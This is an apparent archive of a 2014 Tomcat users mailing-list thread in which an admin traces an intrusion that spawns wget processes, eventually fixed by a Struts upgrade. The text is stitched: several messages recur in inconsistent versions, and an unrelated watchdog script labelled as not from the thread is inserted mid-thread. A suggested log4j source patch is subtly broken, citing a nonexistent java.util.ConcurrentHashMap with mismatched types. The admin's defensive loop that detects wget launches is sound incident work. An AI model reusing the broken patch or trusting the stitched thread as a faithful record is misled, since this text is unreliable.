Posted to users@tomcat.apache.org by Leonardo Santagostini <ls...@gmail.com> on 2014/04/29 21:08:06 UTC

Regarding I think an intrusion

Hello list,

I'm facing an issue in 6 Tomcat servers that are getting penetrated, and they
are executing malicious scripts on my server.

I'm using 7.0.53 on my servers, running CentOS 5.8.

Let me know what information you need.

PS: This is my first mail to this list, so I apologize for this not-so-gentle
presentation.

Regards.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>

Re: Regarding I think an intrusion

Posted by JB MORLA <jb...@gmail.com>.
Hi,

I am learning to set up a server and I found this article about security

http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables





Re: Regarding I think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Well, well, well. Thank you all so much!!!

Since the Struts upgrade I have had no intrusions on my servers =) =)

Thank you, list, for the support, for the time and for helping me with this issue.

Yours,
Leonardo


Regards.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-05-20 12:45 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:

> Hello all, again it's me =)
>
> Just to let you know that today we deployed our apps using Struts 2.3.16.2
>
> So from today I will monitor those servers very closely =)
>
> Thanks, everyone. I will tell you how things go.
>
> Regards,
> Leonardo
>
> Regards.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
>
>> Hello all!
>>
>> Developers are still "estimating the effort" for upgrading Struts.... I
>> will let you know how things are going.
>>
>> Thanks all for replying to me.
>>
>> Regards,
>> Leonardo
>>
>> Regards.-
>> Leonardo Santagostini
>>
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>>
>>
>>
>> 2014-05-05 15:39 GMT-03:00 Martin Gainty <mg...@hotmail.com>:
>>
>>> > Subject: Re: Regarding I think an intrusion
>>> > From: lsantagostini@gmail.com
>>> > To: users@tomcat.apache.org
>>> >
>>> > Hello Chris, but this logfile was only one day.
>>> MG>Ay Caramba!
>>> >
>>> > Maybe I had a concept mismatch trying to capture the exact moment when
>>> > the execution begins.
>>> >
>>> > My command was
>>> >
>>> > while true; do
>>> >   CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v "127.0.0.1" | wc -l)
>>> >   if [ "$CUENTO" -gt 0 ]; then
>>> >     PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
>>> >     echo -e "Se encontro wget corriendo, sacando dump de JVM..."
>>> >     kill -3 $PIDJAVA
>>> >   fi
>>> >   sleep 3
>>> > done
>>> >
>>> > Maybe too many dumps all together; now I'm trying to get a "live"
>>> > capture, without luck =(
>>> >
>>> > If you know a better method, please let me know.
>>> >
>>> > Thanks for your effort, kind regards,
>>> > Leonardo
>>> >
>>> > Regards.-
>>> > Leonardo Santagostini
>>> MG>Tomcat APR cannot use WebSockets with JDK 1.6 ... you need to
>>> use JDK 1.7 (now)
>>> MG>this
>>> "ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10
>>> tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
>>>    java.lang.Thread.State: TIMED_WAITING (sleeping)
>>>  at java.lang.Thread.sleep(Native Method)
>>>  at
>>> org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
>>>  at java.lang.Thread.run(Thread.java:662)
>>> MG>These informational log entries produce A LOT of noise
>>> MG>log4j.properties
>>> MG>log4j.logger.org.quartz=OFF      // (shut up, Quartz)
>>>
>>> MG>that
>>> "ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656
>>> runnable [0x0000000046f34000]
>>>    java.lang.Thread.State: RUNNABLE
>>>  at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
>>>  at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
>>>  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
>>>  at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
>>>  at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
>>>  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
>>>  at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
>>>  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
>>>  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
>>>  at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
>>>  at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
>>> MG>TOO MUCH!
>>> MG>you need to change match-type from regex to wildcard in Tuckey
>>> .\WEB-INF\urlrewrite.xml... for example
>>> <!-- regex is not necessary -->
>>>     <!-- rule match-type="regex">
>>>         <name>BasicRule</name>
>>>         <from>basicfrom</from>
>>>         <to>basicto</to>
>>>     </rule -->
>>>     <rule match-type="wildcard">
>>>         <name>BasicRule</name>
>>>         <from>basicfrom</from>
>>>         <to>basicto</to>
>>>     </rule>
>>> MG>you can see that name, from and to are the same
>>>
>>> MG>Every time you see 'Runnable' and 'locked' (for example)
>>> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
>>> waiting on condition [0x000000004ad9b000]
>>>    java.lang.Thread.State: RUNNABLE
>>>  at java.util.Vector.addElement(Vector.java:572)
>>>  - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
>>>  at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
>>>  at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
>>>  - locked <0x00000006e0303d80> (a java.util.Hashtable)
>>>
>>> MG>you need to kill the process or change the slow process ...(log4j
>>> updateParents), for example in log4j
>>> package org.apache.log4j;
>>> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
>>> org.apache.log4j.spi.RendererSupport{
>>>   private org.apache.log4j.spi.LoggerFactory defaultFactory;
>>>   private java.util.Vector listeners;
>>>   //  Hashtable ht;
>>>   // ConcurrentHashMap lives in java.util.concurrent, and the map holds both
>>>   // ProvisionNode and Logger values under a CategoryKey, as the Hashtable did
>>>   java.util.concurrent.ConcurrentHashMap<CategoryKey,Object> ht =
>>>       new java.util.concurrent.ConcurrentHashMap<CategoryKey,Object>();
>>>
>>> // much later
>>> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
>>> factory) {
>>> ....
>>>       } else if (o instanceof org.apache.log4j.ProvisionNode) {
>>>  //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
>>>  logger = factory.makeNewLoggerInstance(name);
>>>  logger.setHierarchy(this);
>>>  ht.put(key, logger);
>>>  updateChildren((ProvisionNode) o, logger);
>>>  updateParents(logger);
>>>  return logger;
>>>       }
>>>
>>>
>>> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
>>> MG>Understand?
>>> MG>Martín
>>>
>>> >
>>> > <http://ar.linkedin.com/in/santagostini>
>>> >
>>> >
>>> >
>>> >
>>> >
>>> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
>>> chris@christopherschultz.net
>>> > >:
>>> >
>>> > > Leonardo,
>>> > >
>>> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
>>> > > > Ok, again it's uploaded.
>>> > > >
>>> > > > This is the link
>>> > > > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>>> > >
>>> > > 1/2 GiB log file? Hrm.
>>> > >
>>> > > It doesn't even have any calls to Runtime.exec in it. If you have a
>>> > > snapshot of a thread dump (and only the thread dump, I don't need 3
>>> > > weeks of your logs) that you took while the "intrusion" was taking
>>> > > place, post that.
>>> > >
>>> > > If you don't, then I think you're out of luck.
>>> > >
>>> > > Sounds like a bad time to go on holiday.
>>> > >
>>> > > -chris
>>>
>>>
>>
>>
>
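Leonardo's loop quoted above fires on any wget on the host and, as he says, produced too many dumps at once. The following is an added example, not code from the thread, that reacts only to processes spawned by the Tomcat JVM (what a web app coerced into calling Runtime.exec produces), takes the single thread dump Chris asked for via SIGQUIT, and then backs off. It assumes Linux procps ps/pgrep and that Tomcat was started through org.apache.catalina.startup.Bootstrap; the ps sample inside is constructed for the self-test.

```shell
#!/bin/sh
# Added example, not from the thread: a watchdog that reacts only to processes
# spawned by the Tomcat JVM, instead of to any wget on the host.

# Constructed sample of `ps -eo pid,ppid,comm` output for the self-test:
# the JVM is pid 2550; it spawned sh (3010) which spawned wget (3011), and a
# second java (4100); the wget at 4000 belongs to init and must be ignored.
SAMPLE_PS='  PID  PPID COMMAND
    1     0 init
 2550     1 java
 3010  2550 sh
 3011  3010 wget
 4000     1 wget
 4100  2550 java'

# jvm_children PS_TEXT JVM_PID
# Prints "pid comm" for every process that is a child or grandchild of JVM_PID.
# Two levels are enough to catch the usual "java -> sh -c ... -> wget" chain.
jvm_children() {
  ps_text=$1
  jvm=$2
  printf '%s\n' "$ps_text" | awk -v jvm="$jvm" '
    NR > 1 { ppid[$1] = $2; comm[$1] = $3 }
    END {
      for (p in ppid) {
        q = p
        for (depth = 0; depth < 2 && (q in ppid); depth++) {
          if (ppid[q] == jvm) { print p, comm[p]; break }
          q = ppid[q]
        }
      }
    }' | sort -n
}

# jvm_child_count PS_TEXT JVM_PID -> number of suspicious descendants
jvm_child_count() {
  jvm_children "$1" "$2" | wc -l | tr -d ' '
}

# Live watchdog (Linux procps assumed). On the first hit it records who spawned
# what, takes ONE thread dump (SIGQUIT -> catalina.out) so the request thread
# that launched the child is visible, then backs off so catalina.out is not
# flooded with dumps.
watch_tomcat() {
  jvm=$(pgrep -f org.apache.catalina.startup.Bootstrap | head -n 1)
  if [ -z "$jvm" ]; then
    echo "no Tomcat JVM found" >&2
    return 1
  fi
  echo "watching JVM pid $jvm"
  while true; do
    found=$(jvm_children "$(ps -eo pid,ppid,comm)" "$jvm")
    if [ -n "$found" ]; then
      echo "$(date '+%F %T') JVM $jvm has spawned:"
      # Full command lines of the spawned processes, for the incident record.
      pids=$(printf '%s\n' "$found" | awk '{ printf "%s%s", sep, $1; sep = "," }')
      ps -o pid,ppid,user,etime,args -p "$pids"
      kill -3 "$jvm"   # SIGQUIT: the JVM prints all thread stacks to its stdout
      sleep 60         # back off: at most one dump per minute
    else
      sleep 3
    fi
  done
}

# Run the live watchdog only when asked, so the file can also be sourced.
if [ "${1:-}" = "--watch" ]; then
  watch_tomcat
fi
```

Run it as `sh watchdog.sh --watch` on the Tomcat host; the thread dump lands wherever the JVM's stdout goes (catalina.out on a stock install).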

Re: Regarding I think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, again it's me =)

Just to let you know that today we deployed our apps using Struts 2.3.16.2

So from today I will monitor those servers very closely =)

Thanks, everyone. I will tell you how things go.

Regards,
Leonardo

Regards.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>






Re: Regarding I think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all!

Developers are still "estimating the effort" for upgrading Struts.... I
will let you know how things are going.

Thanks all for replying to me.

Regards,
Leonardo

Regards.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





>
> MG>necessita mata el proceso o cambia proceso lento ...(log4j
> updateParents) por ejemplo en log4j
> package org.apache.log4j;
> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
> org.apache.log4j.spi.RendererSupport{
>   private org.apache.log4j.spi.LoggerFactory defaultFactory;
>   private java.util.Vector listeners;
>   //  Hashtable ht;
> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
> java.util.ConcurrentHashMap<String,ProvisionNode>();
>
> //mucho mas tarde
> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
> factory) {
> {
> ....
>       } else if (o instanceof org.apache.log4j.ProvisionNode) {
>  //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
>  logger = factory.makeNewLoggerInstance(name);
>  logger.setHierarchy(this);
>  ht.put(key, logger);
>  updateChildren((ProvisionNode) o, logger);
>  updateParents(logger);
>  return logger;
>       }
>
>
> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
> MG>Entiendes?
> MG>Martín
>
> >
> > <http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net
> > >:
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA256
> > >
> > > Leonardo,
> > >
> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > > Ok, again its uploaded.
> > > >
> > > > This is the link
> > > >
> > > >
> > >
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> > >
> > > 1/2
> > > >
> > > GiB log file? Hrm.
> > >
> > > It doesn't even have any calls to Runtime.exec in it. If you have a
> > > snapshot of a thread dump (and only the thread dump, I don't need 3
> > > weeks of your logs) that you took while the "intrusion" was taking
> > > place, post that.
> > >
> > > If you don't, then I think you're out of luck.
> > >
> > > Sounds like a bad time to go on holiday.
> > >
> > > - -chris
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: GnuPG v1
> > > Comment: GPGTools - http://gpgtools.org
> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> > >
> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> > > EcwrNcX2iZ+JXXtSTnzH
> > > =nxGK
> > > -----END PGP SIGNATURE-----
> > >
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> > > For additional commands, e-mail: users-help@tomcat.apache.org
> > >
> > >
>
>

RE: Regarding i think an intrusion

Posted by Martin Gainty <mg...@hotmail.com>.
> Subject: Re: Regarding i think an intrusion
> From: lsantagostini@gmail.com
> To: users@tomcat.apache.org
> 
> Hello Chris, but this logfile was only one day.
MG>Ay Caramba!
> 
> Maybe I had a concept mismatch trying to capture the exact moment when the
> execution begins.
> 
> My command was
> 
> while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
> "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
> java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
> corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
> 
> Maybe too many dumps all together, now I'm trying to get a "live" capture
> without luck =(
>
> If you know a better method, please let me know it.
>
> Thanks for your effort, kind regards,
> Leonardo
> 
> Saludos.-
> Leonardo Santagostini
MG>Tomcat APR cannot use WebSockets with JDK 1.6 ...you need to use JDK 1.7 (now)
MG>this
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
 at java.lang.Thread.sleep(Native Method)
 at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
 at java.lang.Thread.run(Thread.java:662)
MG>These informational log records produce a LOT of noise
MG>log4j.properties
MG>log4j.logger.org.quartz=OFF      //(Shut up, Quartz)

MG>that
"ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656 runnable [0x0000000046f34000]
   java.lang.Thread.State: RUNNABLE
 at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
 at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
 at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
 at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
 at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
MG>TOO MUCH!
MG>you need to change match-type from regex to wildcard in Tuckey .\WEB-INF\urlrewrite.xml...for example
<!-- regex is not necessary -->
    <!-- rule match-type="regex">
        <name>BasicRule</name>
        <from>basicfrom</from>
        <to>basicto</to>
    </rule -->
    <rule match-type="wildcard">
        <name>BasicRule</name>
        <from>basicfrom</from>
        <to>basicto</to>
    </rule>
MG>you can see that name, from and to are the same

MG>Whenever you see 'Runnable' and 'locked' (for example)
"http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d waiting on condition [0x000000004ad9b000]
   java.lang.Thread.State: RUNNABLE
 at java.util.Vector.addElement(Vector.java:572)
 - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
 at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
 at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
 - locked <0x00000006e0303d80> (a java.util.Hashtable)

MG>you need to kill the process or change the slow process ...(log4j updateParents), for example in log4j
package org.apache.log4j;
public class Hierarchy implements org.apache.log4j.spi.LoggerFactory, org.apache.log4j.spi.RendererSupport{
  private org.apache.log4j.spi.LoggerFactory defaultFactory;
  private java.util.Vector listeners;
  //  Hashtable ht;
java.util.ConcurrentHashMap<String,ProvisionNode> ht=new java.util.ConcurrentHashMap<String,ProvisionNode>();
 
//much later
public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory factory) {
....
      } else if (o instanceof org.apache.log4j.ProvisionNode) {
 //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
 logger = factory.makeNewLoggerInstance(name);
 logger.setHierarchy(this);
 ht.put(key, logger);
 updateChildren((ProvisionNode) o, logger);
 updateParents(logger);
 return logger;
      }

http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
MG>Do you understand?
MG>Martín


Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Chris, but this logfile was only one day.

Maybe I had a concept mismatch trying to capture the exact moment when the
execution begins.

My command was

while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
"127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3;  done


Maybe too many dumps all together, now I'm trying to get a "live" capture
without luck =(

If you know a better method, please let me know it.

Thanks for your effort, kind regards,
Leonardo


Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-05-05 13:06 GMT-03:00 Christopher Schultz <chris@christopherschultz.net>:


Re: Regarding i think an intrusion

Posted by Christopher Schultz <ch...@christopherschultz.net>.

Leonardo,

On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> Ok, again it's uploaded.
> 
> This is the link
> 
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing

1/2 GiB log file? Hrm.

It doesn't even have any calls to Runtime.exec in it. If you have a
snapshot of a thread dump (and only the thread dump, I don't need 3
weeks of your logs) that you took while the "intrusion" was taking
place, post that.

If you don't, then I think you're out of luck.

Sounds like a bad time to go on holiday.

-chris

---------------------------------------------------------------------
